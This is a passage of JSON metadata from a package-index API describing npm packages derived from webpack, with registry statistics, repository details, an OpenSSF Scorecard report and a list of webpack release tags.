kages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-zxg/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-zxg/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-zxg/codemeta","maintainers":[{"uuid":"zcgzxg","login":"zcgzxg","name":null,"email":"1134495285@qq.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~zcgzxg","role":null,"created_at":"2022-11-15T10:40:46.441Z","updated_at":"2022-11-15T10:40:46.441Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/zcgzxg/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1721855,"name":"fis-msprd-webpack_1_14_0","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jade, coffee, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":3,"first_release_published_at":"2016-12-25T09:10:01.769Z","latest_release_published_at":"2017-01-10T09:30:16.832Z","latest_release_number":"1.14.2","last_synced_at":"2026-09-03T00:16:59.628Z","created_at":"2022-04-09T15:38:45.272Z","updated_at":"2026-09-03T00:16:59.628Z","registry_url":"https://www.npmjs.com/package/fis-msprd-webpack_1_14_0","install_command":"npm install fis-msprd-webpack_1_14_0","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.14.2"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosy